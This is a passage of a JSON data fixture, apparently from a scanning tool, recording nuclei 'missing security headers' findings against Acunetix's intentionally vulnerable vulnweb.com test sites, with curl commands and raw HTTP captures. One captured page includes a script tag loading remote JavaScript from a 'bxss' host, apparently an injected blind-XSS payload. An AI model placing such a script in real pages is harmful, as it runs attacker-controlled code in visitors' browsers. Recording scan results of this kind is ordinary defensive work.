82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46' 'http://testhtml5.vulnweb.com'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:41:22.079Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 547, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 76, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15' 'http://testaspnet.vulnweb.com'", + "type": "http", + "http_url": "http://testaspnet.vulnweb.com", + "discovered_date": "2024-11-13T02:41:22.221Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testaspnet.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 14069\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASP.NET_SessionId=vmit32btaeasjnawkbexxh55; path=/; HttpOnly\r\nX-Aspnet-Version: 2.0.50727\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >\r\n<HTML>\r\n\t<HEAD>\r\n\t\t<title>acublog news</title>\r\n\t\t<META http-equiv="Content-Type" content="text/html; charset=windows-1252">\r\n\t\t<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">\r\n\t\t<meta content="C#" name="CODE_LANGUAGE">\r\n\t\t<meta content="JavaScript" name="vs_defaultClientScript">\r\n\t\t<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">\r\n\t\t<LINK href="styles.css" type="text/css" rel="stylesheet">\r\n\t</HEAD>\r\n\t<body>\r\n\t\t<form name="Form1" method="post" action="default.aspx" id="Form1">\r\n<div>\r\n<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />\r\n<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />\r\n<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />\r\n</div>\r\n\r\n<script type="text/javascript">\r\n//<![CDATA[\r\nvar theForm = document.forms['Form1'];\r\nif (!theForm) {\r\n theForm = document.Form1;\r\n}\r\nfunction __doPostBack(eventTarget, eventArgument) {\r\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\r\n theForm.__EVENTTARGET.value = eventTarget;\r\n theForm.__EVENTARGUMENT.value = eventArgument;\r\n theForm.submit();\r\n }\r\n}\r\n//]]>\r\n</script>\r\n\r\n\r\n<div>\r\n\r\n\t<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />\r\n\t<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig" />\r\n</div>\r\n\t\t\t\r\n<TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>\r\n\t\t<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"\r\n\t\t\theight="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>\r\n\t</TR>\r\n</TABLE>\r\n<TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>\r\n\t\t\t<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">\r\n\t\t\t\tsignup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>\r\n\t\t\t\t<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>\r\n\t\t</TD>\r\n\t\t<td class="MenuBar" align="right" width="50px">\r\n\t\t\t<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>\r\n\t\t</td>\r\n\t</TR>\r\n</TABLE>\r\n\r\n\t\t\t<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD id="tdPageData" valign="top">\r\n\t\t\t\t\t<DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">(37) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">(37) comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">(41) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>\r\n\r\n\t\t\t\t\t<TD vAlign="top" width="200">\r\n\t\t\t\t\t\t<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">\r\n\t<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">\r\n\t\t<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9040')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">November 2024</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9101')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>\r\n\t</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9066')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9067')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9068')" style="color:Black" title="October 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9069')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9070')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9071')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9072')" style="color:Black" title="November 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9073')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9074')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9075')" style="color:Black" title="November 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9076')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9077')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9078')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9079')" style="color:Black" title="November 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9080')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9081')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9082')" style="color:Black" title="November 12">12</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9083')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9084')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9085')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9086')" style="color:Black" title="November 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9087')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9088')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9089')" style="color:Black" title="November 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9090')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9091')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9092')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9093')" style="color:Black" title="November 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9094')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9095')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9096')" style="color:Black" title="November 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9097')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9098')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9099')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9100')" style="color:Black" title="November 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9101')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9102')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9103')" style="color:Black" title="December 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9104')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9105')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9106')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9107')" style="color:Black" title="December 07">7</a></td></tr>\r\n</table><BR>\r\n<a href="rssFeed.aspx">Get RSS feed</a>\r\n</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD colSpan="2">\r\n\t\t\t\t\t</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t</TABLE>\r\n\t\t</form>\r\n\t</body>\r\n\t<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">\r\n\t\t<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>\r\n\t</div>\r\n</HTML>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 548, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' 'http://testasp.vulnweb.com/T'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/T", + "discovered_date": "2024-11-13T02:41:22.360Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /T HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nContent-Length: 1233\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:46 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>403 - Forbidden: Access is denied.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>403 - Forbidden: Access is denied.</h2>\r\n <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 549, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/login'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/login", + "discovered_date": "2024-11-13T02:41:22.515Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /login HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 550, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202", + "discovered_date": "2024-11-13T02:41:22.694Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/libs/sessvars.js:202 HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: 